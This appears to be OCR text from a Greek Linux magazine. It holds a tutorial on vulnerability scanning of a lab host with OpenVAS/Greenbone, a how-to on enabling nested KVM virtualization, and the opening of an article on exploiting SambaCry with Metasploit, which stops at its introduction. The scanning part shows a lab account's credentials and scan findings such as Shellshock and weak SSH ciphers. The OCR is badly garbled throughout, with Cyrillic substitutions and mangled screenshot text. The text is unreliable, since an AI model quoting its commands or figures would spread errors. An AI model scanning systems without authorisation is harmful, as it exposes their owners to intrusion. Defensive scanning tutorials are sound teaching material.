Παρεμπιπτόντως, αξίζει να αλλάξουμε την τιµή στο λευκό πεδίο που βρίσκεται 
στην πάνω οριζόντια, πράσινη μπάρα, του Сгеепропе Security Assistant. Εμείς, T.X., 
έχουµε βάλει εκεί την τιµή Refresh every 30 Sec., юсте κάθε 30 δευτερόλεπτα να 
ανανεώνονται τα περιεχόμενα της σελίδας κι έτσι να παρακολουθούμε -σχεδόν 
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ζωντανά- την πρόοδο του task ή των tasks που έχουµε ξεκινήσει. Όση ώρα διαρκεί 
то scanning, αν θέλουμε μπορούμε να εξερευνήσουµε άλλες σελίδες του мер panel. 
То task θα εκτελείται στο background - μάλιστα ακόµη κι αν αποσυνδεθούµε апо 
τον Security Assistant. Па να τσεκάρουµε αν έχει ολοκληρωθεί η διαδικασία ή πώς 
προχωρά, τέλος πάντων, επιλέγουμε Scans / Tasks. Отау το scanning τελειώνει, 
στη στήλη Status και στη γραμμή του αντίστοιχου task βλέπουμε µια γαλάζια μπάρα 
που γράφει Done. Με κλικ πάνω της εμφανίζονται τα αποτελέσµατα του task. Δείτε 
τα screenshots που ακολουθούν, διαβάστε και τις αντίστοιχες περιγραφές. 


тіре //127.04 


ж Greenbone 
Ф? Security Assistant 


нд сз = TEE ; ~l O έλεγχος του 
E = ШИ olafsvik.colder.is үа 
αδυναμίες ολοκλη- 
ρώθηκε. Στη στ 
Severity το score εἰναι 
моа with ну severity ound 4.3, γεγονός που µας 
προϊδεάζει για κάποια 
ζητήματα ασφαλείας. 
Τα αποτελέσµατα του 
Ελέγχου τα βλέπου- 
µε µε éva κλικ πάνω 
στο Done, στη στήλη 
Status. 


Greenbone Security Assistant - Mozilla Firefox 


Ф Greenbone Security A.. ж |ж 


(€) © A | htips://127.0.0.:9392/0mp?cmd=get-report&report-id=3b893d4d-be52-4a98-822d-7d1c4d6 | с | [Q Search | vlie + № 


C τ 
Sal Мау 20 14:39:37 2017 UTC 


Ιδού η σύντομη λίστα 
με τα προβλήματα 

ασφαλείας που αφο- 
mrem 3 мня ӘЗЕР ρούν στο olafsvik. Το 


мев “ αφορά στην υπηρεσία 


SSH και συγκεκριµένα 
στους χρησιμοποιού- 
µενους αλγόριθμους 
κρυπτογράφησης, οι 
οποίοι θα μπορούσαν 
να εἰναι ισχυρότεροι. 
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Assistant - Mozilla Firefox 
Ф Greenbone Securty A.» 


Results by CVSS (Total: 17) 


ΠΝ 


за May 20 14:07:54 3017 
за May 20 14:07:51 2017 
Sat May 20 14:07:50 2017 
Sat May 20 14:07:49 2017 
за May 20 14:07:48 2017 
Sat May 20 14:07:47 2017 
за May 20 14:07:36 2017 
Sat May 20 14:07:32 2017 


Αν θέλουμε ὀλατα αποτελέσµατα ενός task, ακόµη και τα πληροφοριακά μηνύματα 
που απλά καταγράφονται ото log, τότε επιλέγουμε Scans / Reports και κάνουμε 
κλικ ото όνομα του task. Στη νέα σελίδα που εμφανίζεται πατάμε πάνω στον αριθ- 
ро στα δεξιά της γραμμής Results. Παρατηρήστε ότι та αποτελέσµατα μπορούμε 
να τα ταξινομούμε µε βάση το Severity. Χρήσιμα εἶναι και τα γραφήματα στο πάνω 
μέρος της σελίδας, καθώς και то мога сіоча. Πράγματι, µε μια ματιά βλέπουμε 
πόσο κρίσιμη είναι η κατάσταση, καθώς και σε τι αφορούν τα όποια προβλήματα 
ἔχουν εντοπιστεί. 


Greenbone Security Assistant - Mozilla Firefox 


Ф Greenbone Security A.. ж \ 4 


€) © A | https://127.0.0.1:9392/0mp?r=1&cmd=get-re 


16 b74e-4024-936f-4b4b04281708 
y 20 142754 2017 


©, Result: SSH Weak Encryption Algorithms Supported у 20 14:07:54 2017 


ССНИ еттер. τ- 
Ер 


Summary 
ће remote SSH server is configured to allow weak encryption algorithms. 


Vulnerability Detection Result 
The following weak client-to-server encryption algorithns are supported by the remote service: 


в 
arcfour256 
cast128-cbe 
rijndael-cbc@lysator. Liu.se 


The following weak server-to-client encryption algorithns are supported by the remote service: 


aes256-cbc 


castızB-cbe 
rajndael-cbc@lysator. Liu.se 
Solution 

Solution type: @ mitigation 

Disable the weak encryption algorithms. 
ушпа 

The “arcfour four stream cipher with 128-bit keys. The Arcfour cipher is believed to be compatible with the RC4 cipher [SCHNEIER]. Arcfour (and АСА) has problems with weak keys, and should not be used 
anymore. 

тпе попе" algorithm specifies that no encryption is to be done. Note that this method provides no confidentiality protection, and it is МОТ RECOMMENDED το use it- 


Με κλικ σε µια οποιαδήποτε καταχώρηση της στήλης Vulnerability φορτώνει µια 
νέα σελίδα, µε πολλές περισσότερες πληροφορίες για την αντίστοιχη αδυναμία 
καθώς και µε προτάσεις για την αντιμετώπισή της. Στο screenshot βλέπουμε τους 
αδύναμους αλγορίθµους кроптоү σης που υποστηρίζει ο SSH server του στό- 
хоо, καθώς κι έναν “προφανή, για τη συγκεκριμένη περίπτωση- τρόπο αντιµετώ- 
πισης του προβλήματος. 
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Greenbone Security Assistant - Mozilla Firefox 
jJ 9 Greenbone Security A.. х \ + 
Ф) оа | https://127.0.0.1:9392/omp?cmd=get. t-id=c444fbac-df68-4a3e 13fe9c Search тв 4 4 Ξ 


δν СгеепЬопе τ jedin as Admin admin | Logout -- 
2 Security Assistant о = Sat May 20 14:42:42 2017 UTC 


а ze 


ῄ 10: с444рас-168-4а3е-8400-е713Ге945547 
“ж Created: Sat Мау 20 14:07:14 2017 
Я Modified: Sat Мау 20 14:07:14 2017 
Result: TCP timestamps Отот admin. 


2000 | 


TCP timestamps 80% 192.168.193.235 general/tcp Ва 


Ѕитта 
Тһе remote host implements ТСР timestamps and therefore allows {о compute the uptime. 


Vulnerability Detection Result 

It was detected that the host implements RFC1323. 

The following timestamps were retrieved with a delay of 1 seconds in-between: 
6 


Раскеї 1: 1276528: 
Packet 2: 12765555 


Impact 
Aside efect of thls feature ἰς that the uptime of the remote host can sometimes be computed. 


Solution 

Solution type: ЁЗ mitigation 

то disable TCP timestamps оп linux add the line 'net.ipvä.tcp_timestamps = 0' to /etc/sysctl.conf. Execute ‘sysctl -p' to apply the settings at runtime 
To disable TCP timestamps on Windows execute 'netsh int tcp set global timestamps=disabled' 

Starting with Windows Server 2008 and Vista, the timestamp can not be completely disabled. 


The default bel the TCP/IP stack on this Systems is to not use the Timestamp options when initiating TCP connections, but use them if the TCP peer that is initiating communication includes 
them in their ize (SYN) segment. 


See also: http://www.microsoft.com/en-us/download/details.aspx?id=9152 


Ιδού κι éva παράδειγµα αδυναμίας χαμηλού ρίσκου, η οποία αφορά στα λεγόµε- 
να ТСР timestamps. Εξαιτίας τους είναι δυνατόν να υπολογιστεί ο χρόνος κατά 
τον οποίο ο στόχος είναι ενεργός (uptime). Σε κάποια σενάρια δεν θέλουμε να 
συνάγεται αυτή η πληροφορία, οπότε η λύση είναι να απενεργοποιήσουµετα ТОР 
timestamps. Στο πλαίσιο Solution περιγράφεται το τι πρέπει να κάνουμε αν то 
μηχάνημα τρέχει Linux ή Windows. 


Είναι τα πράγµατα χειρότερα απ’ όσο δείχνουν; 


Στην πραγματική ζωή συχνά εἰναι, ара ίσως να ναι και στο τεχνολογικό σύμπαν. 
Μπορεί βέβαια να κάνουμε λάθος, αλλά γιατί у αναρωτιόµαστε; Προτείνουμε να 
δοκιµάσουµε και µετά ο καθένας ας βγάλει τα δικά του συμπεράσματα. Στη συγκε- 
κριµένη περίπτωση, λοιπόν, λέμε να σκανάρουµε ξανά το olafsvik.colder.is για aðu- 
ναμίες, αυτή τη φορά όµως µε τη γνώση των credentials ενός “απλού χρήστη του 
συστήµατος, χωρίς δικαιώματα root. Па το παράδειγµα που εξετάζουμε, στο σύ- 
στηµα-στόχο υπάρχει ένας λογαριασμός απλού χρήστη µε username το guest και 
password το ѕирегѕесгеї. O χρήστης αυτός ἐχει απομακρυσμένη πρόσβαση στο un- 
χάνηµα µέσω SSH, αλλά και то δικαίωμανα στέλνει και να παίρνει αρχεία µέσω της 
SAMBA. Σε κάθε περίπτωση, στην αντίστοιχη υπηρεσία συνδέεται µε τα credentials 
που μόλις παραθέσαμε. 


Τώρα, στο OpenVAS έχουµε τη δυνατότητα να δημιουργούμε credentials της μορφής 
иѕегпате/раѕѕуога кі éva ή περισσότερα από αυτά τα ζεύγη να та αντιστοιχίζουμε 
σε έναν ή σε περισσότερους στόχους. Μετά φτιάχνουμε αντίστοιχα tasks τα οποία 
και τρέχουμε, πραγματοποιώντας security scans κατά τα οποία επιτυγχάνονται ouv- 
δέσεις σε user accounts των στόχων. Кат' αυτόν τον τρόπο το ОрепуА5 συλλέγει 
πολλές περισσότερες πληροφορίες γιαλειτουργικά συστήµατα και υπηρεσίες, έτσι 
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τα reports που παράγει εἶναι πολύ περισσότερο αναλυτικά. Па να δούμε, λοιπόν, τι 
περισσότερο θα μπορέσουμε -av µπορέσουµε- να βρούμε για то olafsvik, το στόχο 
του παραδείγματός µας. Εργαζόµαστε ως ακολούθως. 


"Από το мер panel του ОрепуА5 επιλέγουμε Configuration / Credentials. 


“ Στη σελίδα που εμφανίζεται κάνουμε κλικ ото γαλάζιο κουτάκι µε τον αστερἰ- 
око, πάνω αριστερά (New Credential). 


“ Στο νέο παράθυρο που παρουσιάζεται δίνουμε то username (guest) και το 
password (ѕирегѕесгейћ) του χρήστη στο olafsvik. 


(Applied fiter: fows=10 fist=1Sort=name) 


Bač keni gperstor 0,045. 


New Credential 


Name 
Comment 


Type 


Allow insecure 


Auto-generate 
Username 


Password 


guest AT olafsvik 
username and password 


Username + Password 


D Yes Φ Νο 


Ορισµός των creden- 
tials, δηλαδή του us- 
егпагпе και του ρ855- 
word, του χρήστη 


guest στο μηχάνημα- 
στόχο. 


бгеепһопе Security Assistant - Mozilla Firefox 
| Greenbone Security A.. х \ 4 
ΚΙ] 127.0.0.1 


Refresh every 30 Sec. = 
Configuration Extras 


Administration 


Filter: 


Ш........ (1 of 1) 


туре Сотта гта | 
ΕΓΩ 
УАрріу to раде contents w ΠΕ 


(username and password) με". κ Νο guest 


Ιδού τα credentials που 
έως τώρα γνωρίζει 
το ОрепуА5. 
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УНАФКЕК 


• Πάντα στο мер panel του ΟΡΘΠΝΑΘ, δίνουμε Configuration / Targets. 


“Па άλλη µια φορά πατάμε στο γαλάζιο κουτάκι µε τον αστερίσκο, πάνω αρι- 
στερά (New Target). 


“ Στο παράθυρο που εμφανίζεται ορίζουµε, ката τα γνωστά, νέο στόχο που πε- 
ριλαμβάνει éva µόνο μηχάνημα, µε ΙΡ αυτό του olafsvik. Δεν ξεχνάμε να uno- 
δείξουμε τα credentials για тіс συνδέσεις SSH και SMB (SAMBA). Ειδικά για το 
SSH παρατηρήστε ότι υπάρχει το προκαθορισμένο port, δηλαδή το 22. Αν στο 
συγκεκριµένο στόχο η υπηρεσία του OpenSSH ακούει από άλλο port, το καθο- 
ρίζουμε εδώ. 


jJ Ф Greenbone Security A.. ж | 


( €) © A |https://127.0.0.1:9392/0mp?cmd=get-targets&token=ceb4ba5a-db77-419e-a606-9f4dac522289 с ||Q Search 


% А 
ΧΡ Targets (2 of 2) 


New Target 


Name [olafsvik with creds 


7777772 Соттепі [this is а 5ἱᾳηΙε-Πος! Ι8ΙΦεἰ Μη creds | 


Αρρίίεά Πίτες; rows=10 first=1 sort: © manual [192.168.193.235 


Hosts O роют йе | Вгомве.. | Νο file selected. 
Backend operation: 0.045. ye ч 


Exclude Hosts 

Reverse Lookup Only O Yes ϐ) Νο 

Reverse Lookup Unify O Yes Φ Νο 

Port List All IANA assigned TCP 20... = а 


Alive Test | Scan Config Default X 


(earo ποκα’ 
[τες “д 
г Ja 


Credentials for authenticated checks | 


Ορισµός νέου target που περιλαμβάνει ένα µόνο μηχάνημα (µε ІР то 
192.168.193.235), καθώς και τα credentials ενός (απλού) χρήστη του συστήματος- 
στόχου. Τα στοιχεία σύνδεσης είναι iða τόσο για συνδέσεις SSH, боо και για 
συνδέσεις µέσω SMB (Samba). 
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СгеепЬопе Security Assistant - Mozilla Firefox 
4 Greenbone Security A.. х \ ж 


127.0.0.19 


Refresh every 30 Sec. v В 


Dashboard Assets Secinfo Configuration Extras Administration 


È еее (3 of 3) 
СИИ ТЕНИ 


olafsvik 
(this is a single-host target) 192.168.193.235 1 OpenVAS Default 


тұран SSH: guest АТ olafsvik 
olafsvik with creds 192.168.193.235 1 All IANA assigned TCP 2012-02-10 z 
(this is a signle-host target with creds) SMB: guest АТ olafsvik 


Target for immediate scan of IP 192.168.178.24 192.168.178.24 1 ОрепмА5 Default 


Οι στόχοι που έχουµε ορίσει έως τώρα. Δείτε, παρεμπιπτόντως, εκείνον µε το 
μηχάνημαπου ёҳе ІР то 192.168.178.24, το οποίο βρίσκεται σε ἄλλο τοπικό δίκτυο 
και τρέχει Windows 7. Στο προκείµενο, παρατηρήστε ότι για το νέο στόχο του 
olafsvik υπάρχουν πλέον και τα credentials για συνδέσεις στις υπηρεσίες SSH και 


SMB. 


Μένει τώρα va ορίσουµε éva καινούργιο task, το οποίο θα αφορά στο στόχο που 
μόλις δημιουργήσαμε. Δίνουμε Scans / Tasks, πατάμε στο γαλάζιο κουμπάκι µε τον 


αστερίσκο και φτιάχνουμε το νέο µας task κατά τα γνωστά. 


Greenbone Security Assistant - Mozilla Firefox 


4 Greenbone Security A.. х \ Ф 


€) © @ һгр<://127.0.0.1:3392/отр?ста-де 


Name 
Comment secur lafsvik [with us 
ScanTargets | olatsvik with creds 


Alerts 
Schedule 


Addresutsto Ф yes O πο 
ets 


Apply Overrides Фу Ono 
MinQoD [πα B % 


Alterable Task © уез @ по 
Auto Delete (9 Do not automatically delete reports 


Reports 
Automaticaly delete oldestreponss but always keep newest[5 8) repons 


Scanner | OpenVAS Default 


қ 


һе Gmb mwn.greenbose net 


66:00 
ZEF 
бппаси 
пшыяса 


Κατά τη δηµιουργία νέου task φροντίζουμε шоте уа υποδείξουµε το target µε та 


credentials, δηλαδή αυτό που καθορίσαµε πριν λίγο. 
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Greenbone Security Assistant - Mozilla Firefox 


/ 9 Greenbone Security A.. х \ + 


Ф) оа https://127.0.0.1: 


ово Filter: 
тіп до4-70 apply _overrides= 1 rows= 10 frst=1 sort=name 


Е... (3 of 3) 


asks ity Cl; i Tasks by status (Total: 3) 


Immediate scan of IP 192...) 


Reports 


Immediate scan of IP 192.168.178.24 e] 10) Мау212017 -------... ппняса 


olafsvik mE 
(security scan for olafsvik) 10) Мау202017 Γη... 1 [ν [ν [ο] [η ε] 


olafsvik with creds хуа 

(security scan for olafsvik with username/password pair) ο. ο совасеа 
Арві to page corens = БҮ 

(Applied fiter: min_qod=70 ару оуетійез=1 rows=10 frst=1 sort=name T] 


Το véo task είναι έτοιμο και μπορούμε να то τρέξουμε (κλικ στο πράσινο 
τετραγωνάκι µε το σύμβολο του "play"). Σίγουρα εξάλλου θαπροσέξατε το υψηλό 
Severity εκείνου του άλλου task, για то µηχάνηµα µε τα Windows 7. Δεν φαίνεται 
εδώ, σας λέμε όµως ότιη υπηρεσία διαµοίρασης αρχείων ανέβασε τόσο πολύ то 
score. Το σύστηµα είναι για αρκετό καιρό χωρίς ενημερώσεις ασφαλείας κι αυτή 
τη στιγµή εμφανίζεται ευπαθές шс προς πολύ συγκεκριµένα είδη επιθέσεων. 


Το νέο task για το scanning του olafsvik.colder.is -ue γνωστά τα credentials για σύν- 
ὄεση στις υπηρεσίες SSH και SMB- θα χρειαστεί αρκετό πριν ολοκληρωθεί. Μετά 
το πέρας της διαδικασίας διαπιστώνουμε ότι το Severity score του olafsvik είναι 10, 
δηλαδή μεγαλύτερο ακόµη κι апо το πολύ υψηλό Severity που έχει το unpatched 
σύστημα µε τα Windows 7. Δείτε περισσότερα στα δύο screenshots που ακολουθούν, 
διαβάστε και τις αντίστοιχες περιγραφές. Επίσης: Πειραματιστείτε και χαρείτε το 
ОрепУАЗ5, τον νέο σας αγαπημένο vulnerability scanner. 
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Greenbone Security Assistant - Mozilla Firefox 


4 Greenbone Security A.. х \ ж 


ϐ | https://127.0.0.1:9392'omp? cmd=get tasks &Nlt_Id=&filter=&task_Id=af6129ed-834e-4fd4-94a7-€2851842f1cB&action-s | Œ | [Q Search же “ж 


Әгеепһопе | Refresh every 30 бес. ~ | logged in as Admin admin | Logout ° 
Security Assistant менен ау рат Sun May 21 13.14 34 2017 UTC 


разон scans ss Беште Connguration s Administration 


аап Filter: 


min дов=70 apply ο ο. α 
Yaso (3 of 3) 


Tasks by Severity Class (Total; 3) - Tasks with most High results рег host [O O Tasks by status (Total: 3) | 


H pone 
авик м crest! 
Immediate scan of IP 192.. 


MAET] 


та Е 


Immediate «сап of IP 192.168.178.24 — 10) Мау212017 Сеет повеса 


olafsvik 
(БСО «сап for аи) —— 10) May202017 Oo шиа ппнясп 


olafsvik with creds - 
(security «сап for olafsvik with username/password pair) — 10) Мау212017 соваса 


(рву to paoe соеп ғ |Б) 
(АррПей нег тіп дой-70 apply ovenides=1 rows=10 first=1 sort=rame) CEAT] 


Backend operation: 0.03s Greenbone Security Assistant (GSA| Copyright 2009-2015 by Greenbone Networks GmbH, ο ο 


Το δεύτερο vulnerability scanning του olafsvik έχει ολοκληρωθεί. Αυτή τη φορά 
γνωρίζαμε τα credentials ενός απλού χρήστη του συστήµατος-στόχου, ἔτσι то 
ΌρεηνΑς είχε τη δυνατότητα να τρέξει περισσότερα tests (µέσω SSH και SMB). 
Τα αποτελέσµατα беу χρειάζονται ιδιαίτερο σχολιασμό: έχουµε νέο πρωταθλητή 


, 


- δυστυχώς µε την κακή έννοια :/ 


Greenbone Security Assistant - Mozilla Firefox 


4 Greenbone Security A.. х \ ж 


@ | 11р5://127.0.0.1:9392/0тр?ста=деї героп&героп_1=с92с610-абер-4604-9ге2-319аг7есьсОр8похеѕ=18оуепійеѕ=! | Œ | [Q Search тв ж. 


| No auto-refresh > одеа іп as Admin admin | Logout 
ЕЕЕ ЕЕ Sun Мау 21 13:15:16 2017 UTC 


Беште Configuration s Administration 


Filter: вва acC 


ο πο... 


ο ο ο] 
Modified: Sun Мау 21 13011522017 


© Report: Results (55 of 97) Created: Sun Иау 21 1233242017 


Owner: admin 


88: ---88 


оаа лаю | 


192.168.193.235 (Әзізіік.сеібегіз) депега/гср 


Vulnerability 
SUSE Update for Firefox openSUSE-5U-2016:0733-1 (Firefox) 

SUSE Update for openssl openSUSE-SU-2016:0638-1 (openssl) Teo Hion 192.168.193.235 (olafsvik.colder:is) депегілер 
SUSE Update for Kernel ореп5и5Е-5Ц-2016:3077-1 (Kernel) ЕШ 192.168.193.235 (dlafsvik.colder;is) generaltep 
SUSE Update for libpng16 openSUSE-5U-2015:0161-1 (Ibpng16} 192.168.193.235 (olafsvik.colder:is) депегаілер 
SuSE Update for Mozilla ореп5И5Е-5-2016:0306-1 (Mozilla) 192.168.193.235 (olafsvik.colder;is) general/tcp 
SuSE Update for bash openSUSE-5U-2014:1226-1 (bash) "ο ο (нор! 192.168.193.235 (ořafsvik.colder:is) general/tcp 
SuSE Update for openssl openSUSE-5U-2016:1240-1 (openssl) 120 tgh 192.168.193.235 (olafsvik.colderis) general/tep 
SUSE Update for kernel ореп505Е-50-2014:0678-1 (kernel) Ер 192.168.193.235 (oiafsvik.colderis) general/tcp 


SuSE Update for bash ореп505Е-50-2014:1242-1 (bash) Ер 192.168.193.235 (olafsvik.colderis) general/tcp 


πασασαασσασσα 


: 


SUSE Update for ће openSUSE-SU-2016:0301-1 (кете) Ер 192.168.193.235 (olafsvik.colder:is) general/tcp 


СМО Bash Stacked Redirects aka 'redir_stack' Memory Corruption Vulnerability (LSC) 192.168.193.235 (olafsvik.colderiis) generaltep 
GNU Bash Environment Variable Handling Shell RCE Vulnerability [LSC) - 02 192.168.193.235 (oiafsvik.colder:is) general/tcp 
GNU Bash Environment Variable Handling Shell RCE Vulnerability [LSC) "ο ο πο 192.168.193.235 (olafsvik.colderis) general/tep 
GNU Bash Environment Variable Handling Shell RCE Vulnerability [LSC) - 04 192.168.193.235 (olafsvik.colderis) general/tcp 
GNU Bash Environment Variable Handling Shell RCE Vulnerability (5С) - 03 ου Hion 192.168.193.235 (olafsvik.colderis) generaltep 
05 Епа Of Life Detection ШЕШІ 192 168.193 235 (olafsvik.colderis) general/tep 
SuSE Update for MozillaFirefox openSUSE-SU-2014:0448-1 (MozillaFirefox) СЕ 192 168.193 235 (olafsvik.colderis) дөпег/лср 
SUSE Update for kernel openSUSE-SU-2014:0985-1 (Кетпей) 192.168.193.235 (olafsvik.colderis) general/tcp 


SuSE Update for ca-certificates-mozilla openSUSE-5U-2013:1891-1 (ca-certificates-mozilla) 192.168.193.235 (olafsvik.colderis) generaltcp 


5 εἰ БЕББЕББББББББЕББББИНВЕБ 


рд Т 4 Ta (High) ο 


Μεταξύ ` των ' προβλημάτων ασφαλείας που εντόπισε το OpenVAS στο υπό 
εξέταση σύστημα, συγκαταλέγονται αδυναμίες στον πυρήνα (kernel), στο ΒΑΘΗ 
shell, στη βιβλιοθήκη glibc, στο bind αλλά και στην υπηρεσία του NTP. Όρεξη να 
ἔχουμε να διαβάζουμε λεπτομέρειες για τα vulnerabilities = αλλά και τρόπους 
αντιμετωπισής τους. 
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Skill: Intermediate 
Tags: KVM, virtualization 


Ενεργοποίηση του 
nested virtualization 
γιατο KVM 


Σε κάποιες περιπτώσεις χρειάζεται να τρέχουμε εικονικές μηχανές μέσα σε 
εικονικές μηχανές. Κάτι τέτοιο ίσως ακούγεται περιττό ή/και ἀσκοπο, στην 
πραγματικότητα όµως δεν είναι τίποτε апо та δύο. 


Υποθέστε, για παράδειγµα, ὀτιπειραματιζόμαστε µε éva virtual Серһ storage cluster. 
Εντός του εικονικού δικτύου του Cluster θέλουμε κι έναν (εικονικό) КУМ server, όπου 
ορισμένα VMs θα έχουν ως δίσκους block devices που κατοικούν στο storage cluster. 
Άλλο σενάριο: Εντός ενός УМ διερευνούµε τις δυνατότητες του Kubernetes, και 
μέσα στο УМ θέλουμε δύο ή περισσότερα άλλα VMs για να οργανώνει ο Kubernetes 
та pods του. Μπορούμε ναπαραθέσουµεκι áa παραδείγματα, νομίζουμε όµως ότι 
δεν χρειάζεται. 


Οι σύγχρονοι һурегмі20гѕ επιτρέπουν τη δηµιουργία εικονικών μηχανών µέσα σε 
εικονικές μηχανές, κι ο συνδυασμός Linux kernel/KVM δεν αποτελεί εξαίρεση. Πιο 
συγκεκριµένα, το λεγόμενο *nested virtualization* κάνει δυνατή την εκτέλεση KVM 
ΥΜςμµέσασεκνΜνΜςµε. ταυτόχρονη.. εκμετάλλευση του hardware acceleration 
που παρέχει το host computer (physical hardware). Σε έναν οποιονδήποτε Linux host 
η υποστήριξη nested virtualization ίσως εἶναι ενεργοποιημένη - αλλά ίσως και όχι. 
Προκειμένου να δούμε τι ισχύει µε τον υπολογιστή µας, από éva τερματικό TAN- 
κτρολογούμε 


cat /sys/module/kvm_intel/parameters/nested 
(αν έχουµε Intel СРО) ή 
cat /sys/module/kvm_amd/parameters/nested 


(αν έχουµε AMD 6ΡΙ.).Στην περίπτωση που то cat επιστρέψει 0 ή М, τότε το nested 
virtualization είναι απενεργοποιηµένο. Αν πάλι επιστρέψει 1 ἡ Y, τότε το nested 
virtualization είναι ενεργοποιημένο. 
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Ενεργοποίηση του nested virtualization үа то КҮМ 


/Ћоте capacity: 82,6 GiB 2017-07-02 13:57:20 


r@hólmav 


|с 
|суагеһӧ1тауїк:~> cat 
Ш 


|[суаг@һӧ1тауік: ~> || % 


Στον Intel-based Linux host των δοκιμών μας, то nested virtualization ήταν εξ ορισμού απενεργοποιημένο. 


Αν ο υπολογιστής σας έχει επεξεργαστή АМР, то nested virtualization πιθανώς είναι 
ήδη ενεργοποιημένο. Αν апо την άλλη έχετε µηχάνηµα µε επεξεργαστή Intel, τότε 
το nested virtualization ίσως беу εἶναι ενεργοποιημένο. Σε µια τέτοια περίπτωση, 
αξίζει να δοκιµάσουµε την εκκίνηση του host OS έχοντας δώσει στον πυρήνα την 
παράμετρο Кут-іпїе!.пеѕќед=1. Ειδικά στο openSUSE που πολύ αγαπάμε, µε τη βοή- 
θειατου YaST module ονόματι bootloader είναι πανεύκολο να ρυθµίσουµε τον GRUB 
ώστε η προαναφερθείσα παράμετρος να περνάει. πάντοτε. στον πυρήνα ката то 
boot. 


/һопе capacity: 82,6 GiB Public ІР: 192.168.193. 2017-07-02 14:28:25 

Гуа5Т2 - bootloader @ holmavik | 
Boot Loader Settings 
а. Kernel Parameters: 


В : к 
resume=/dev/sda1 elevator=cfq kvm-intel ,nested= НЕ 


Χρήση του YaST module ονόματι bootloader, ώστε να τροποποιήσουμε τις παραμέτρους που περνούν στον πυρήνα κατά To boot. 


Н νέα παράμετρος για τον πυρήνα λαμβάνεται υπόψη µετά την επόµενη επανεκ- 
κίνηση του λειτουργικού. Ξανά από ένα τερματικό, πληκτρολογούμε και πάλι Cat / 
sys/module/kvym_intel/parameters/nested κι ελέγχουμε το αποτέλεσμα. Αν και τώρα 
δεν δούμε 1 ή Y, τότε είτε ο επεξεργαστής είτε ο πυρήνας του λειτουργικού είναι 
αρκετά παλιός. 
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VHA@KER 


1 /Ћоте capacity: 82,6 GiB 2017-07-02 14:54:25 


cvar@hólmavík:~> 
cvar@hólmavík:~>| cat s/module/kvm_intel/parameter 
Y 


cvar@hólmavík: ~> | VA 


Μετά την επανεκκίνηση του λειτουργικού κι έχοντας περάσει στον Linux kernel την κατάλληλη παράμετρο, µε χαρά 
διαπιστώνουμε ότι το nested virtualization υποστηρίζεται апо то σύστημά µας. 


Με то nested virtualization ενεργοποιημένο είμαστε πλέον σε θέση να φτιάχνουμε 
VMs µέσασε УМ5,дпоо Ta nested VMs θα εκμεταλλεύονται TO hardware acceleration 
του physical host. Οφείλουµε орос ма φροντίζουμε ώστε,γιατα VMs που Ва αποτε- 
λούν hosts άλλων VMs, να ισχύει συγκεκριμένη ρύθμιση όσον αφορά στον εικονικό 
τους επεξεργαστή. Δείτε το screenshot που ακολουθεί, όπου διακρίνεται η σχετική 
ρύθμιση στο περιβάλλον του мігі-тападег. 


Јһоте capacity: 78,4 GiB 2017-07-02 16:44:00 


Begin Installation @ Cancel Installation 


CPUs 
Logical host CPUs: 


Overview 
Memory Current allocation: 
5% Boot Options 

у ΜΠΙΟ Disk 1 


(©) IDE CDROM 1 Configuration 
v Copy host CPU configuration 


Maximum allocation. 


mÈ NIC :be:75:5f 
| Tablet + Topology 


Display Spice 
Sound: ісһв 


æ Console 


& Channel spice 
Video QXL 

ΕΒ Controller USB 
Ф USB Redirector 1 
%) USB Redirector 2 
Э RNG 


Add Hardware 


Το συγκεκριµένο VM θα αποτελέσει Tov host ἄλλων VMs. П. αυτό και µέσα апб το περιβάλλον тоо virt-manager φροντίζουμε 
ώστε για τη CPU του УМ να είναι τσεκαρισµένο то Сору host СРИ configuration. 
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Ενεργοποίηση του nested virtualization үа то КҮМ 


Па éva КҮМ ҮМ που ба αποτελέσει τον host άλλων КҮМ VMs, μένει ένας τελευταί- 
ος έλεγχος που καλό είναι να κάνουµε. µέσα... απότοοιεςίΟ5 Tou virtualized host. 
Συγκεκριµένα, αρκεί να πληκτρολογήσουμε 


virt-host-validate 


και να παρατηρήσουμε το αποτέλεσµατου ελέγχου περί hardware virtualization (στο 
openSUSE, το εργαλείο βρίσκεται στο πακέτο libvirt-client). 


/һөте capacity: 72,5 GiB|Public ІР: 192.168.193.243 2911-01-62 17:46:35 ©] 


AutoYaST Generator оп QEMU/KVM 
File Virtual Machine View Send Key 


=; (- т 


ler mount-point 
" support 

point 8 

(Но ACPI DMAR table found, IOU either disa 


ro 


t: ирро 
Ъ1кіо' controller mount-point 


Αυτό то VM Ва αποτελέσει Tov host άλλων VMs, та οποία θα εκμεταλλεύονται то hardware acceleration тоо physical host. 
Το αποτέλεσµα του πρώτου ελέγχου που διενεργεί то virt-host-validate επιβεβαιώνει ότι, πράγματι, έτσι θα συμβαίνει. 


Όπως φαίνεται και στο screenshot, το αποτέλεσµα θα πρέπει να είναι "PASS". 


ΥΓ. Φτιάξτε τον δικό σας -physical KVM server χωρίς ιδιαίτε- 
ρα ισχυρό hardware. Διαβάστε περισσότερα στη σχετική σειρά άρθρων: 


47 


Skill: Intermediate 
Tags: WannaCry, SambaCry, Samba, SMB, Kali Linux, Metasploit 


To WannaCry 
του LINUX και 
η εκμετάλλευσή του 


Н πρόσφατη ιστορία µε το МаппасСгу, Το ransomware που ταχύτατα µόλυνε 
εκατοντάδες χιλιάδες υπολογιστές Windows σε όλο τον πλανήτη, θύμισε σε 
πολλούς πόσο σηµαντικό είναι να διατηρούµε το λειτουργικό µας σύστημα 
ενημερωμένο. Αλλά ευπαθή δεν αποδεικνύονται µόνο τα μηχανήματα µε 
Windows. 


Λίγο η αναβλητικότητα των διαχειριστών, λίγο η νοοτροπία του "αυτά συμβαίνουν 
σε άλλους", και το αποτέλεσµα εἰναι πως για άλλη µια φορά ένα Windows malware 
βρήκε πρόσφορο ёбафос κι εξαπλώθηκε ταχύτατα σε όλο τον πλανήτη. Κάποιος 
θα προσέθετε -και θα είχε 100% δίκιο-- ότι υπάρχουν δύο ακόµα λόγοι για τη διά- 
δοση κακόβουλου λογισμικού όπως το МаппаСгу ή МаппаСгурї, όπως αλλιώς ovo- 
μάζεται: а) οι χρήστες Windows εἶναι ιλιγγιωδώς πολλοί, В) στην πλειονότητά τους 
ἔχουν ελλιπείς τεχνικές γνώσεις και άγνοια περί βασικών θεμάτων ασφαλείας. 
Έτσι, τα συστήµατά τους εἰναι µμη-ενημερωμένα ή/και αφελώς ρυθµισµένα - ouve- 
πώς κι ευπαθή. 


Στον αντίποδα έχουµε τους χρήστες καιτους διαχειριστές συστημάτων Linux. Ката 
